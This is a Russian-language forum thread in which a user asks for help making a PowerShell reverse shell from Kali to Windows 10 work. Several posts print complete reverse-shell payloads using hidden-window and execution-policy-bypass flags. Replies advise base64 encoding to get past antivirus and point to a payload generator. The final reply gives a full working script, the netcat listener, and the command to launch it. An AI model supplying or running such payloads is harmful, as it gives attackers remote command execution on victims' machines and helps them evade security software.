 |

11.01.2026, 21:49
|
|
Участник форума
Регистрация: 08.06.2022
Сообщений: 153
С нами:
2070937
Репутация:
0
|
|
Привет всем.
Помогите реализовать простой реверс шелл с Kali на windows 10 .
Сам пробовал , но что то не получается , не пойму в чем дело.
На Kali открыл открыл порт рандомный на прослушку:
Код:
На винде от имени админа открваю powershell и пишу там:
Код:
Код:
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("IP_Kali",5555);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
или в таком формате
Код:
Код:
powershell -NoExit -Command "& {
$client = New-Object System.Net.Sockets.TcpClient('IP_Kali', 5555);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535 | % {0};
while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);
$sendback = (Invoke-Expression $data 2>&1 | Out-String);
$sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> ';
$sendbyte = ([Text.Encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte, 0, $sendbyte.Length);
$stream.Flush();
}
$client.Close();
Read-Host 'Press Enter to exit'
}"
P.S. там пишу IP адрес kali естественно. Так же приостановил стандартный антивирус на винде.
После нажатии Enter почему то закрывается окошка просто. Пробовал создать файл ps1, и через отдельное окно его выполнить, но тогда выдает ошибка синтаксиса, типа все неверно, целый лист ошибок.
Может есть рабочий скрипт у кого то? Не сложную, простую, для демонстрации просто.
|
|
|

11.01.2026, 22:17
|
|
Новичок
Регистрация: 08.09.2016
Сообщений: 0
С нами:
5093305
Репутация:
0
|
|
а PowerShell #3 (Base64) не пробовал? Online - Reverse Shell Generator
|
|
|

11.01.2026, 22:51
|
|
Участник форума
Регистрация: 08.06.2022
Сообщений: 153
С нами:
2070937
Репутация:
0
|
|
ссылка не открвается.. только заголовок и каркас сайта видимо тоже под санкциями или цензурой.
А что там можно делать? обфуксировать код под base64 ?
|
|
|

12.01.2026, 00:19
|
|
Участник форума
Регистрация: 08.06.2022
Сообщений: 153
С нами:
2070937
Репутация:
0
|
|
да, base64 получилось )) А собственно в чем была проблема? все же открытый код где то гасится?
Классный проект между прочим, спасибо.
|
|
|

12.01.2026, 00:40
|
|
Постоянный
Регистрация: 28.05.2022
Сообщений: 800
С нами:
2086530
Репутация:
0
|
|
hitman20 сказал(а):
да, base64 получилось )) А собственно в чем была проблема? все же открытый код где то гасится?
Классный проект между прочим, спасибо.
АВ блочить может, вот еще тебе инструмент - GitHub - t3l3machus/hoaxshell: A Windows reverse shell payload generator and handler that abuses the http(s) protocol to establish a beacon-like reverse shell.

|
|
|

11.02.2026, 19:45
|
|
Новичок
Регистрация: 10.02.2026
Сообщений: 0
С нами:
136720
Репутация:
0
|
|
Для начала тебе нужно на компьютере клиента создать файл power.ps1
Вписать туда скрипт
$client = New-Object System.Net.Sockets.TCPClient('192.168.56.1',4444)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i)
$sendback = (iex $data 2>&1 | Out-String)
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> '
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
$stream.Write($sendbyte,0,$sendbyte.Length)
$stream.Flush()
} $client.Close()
После на своей машине прописать команду:
nc -lvnp 4444
При этом порт должен быть открыт
После этого на машине клиента прописываешь команду:
powershell -ExecutionPolicy Bypass -File power.ps1
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|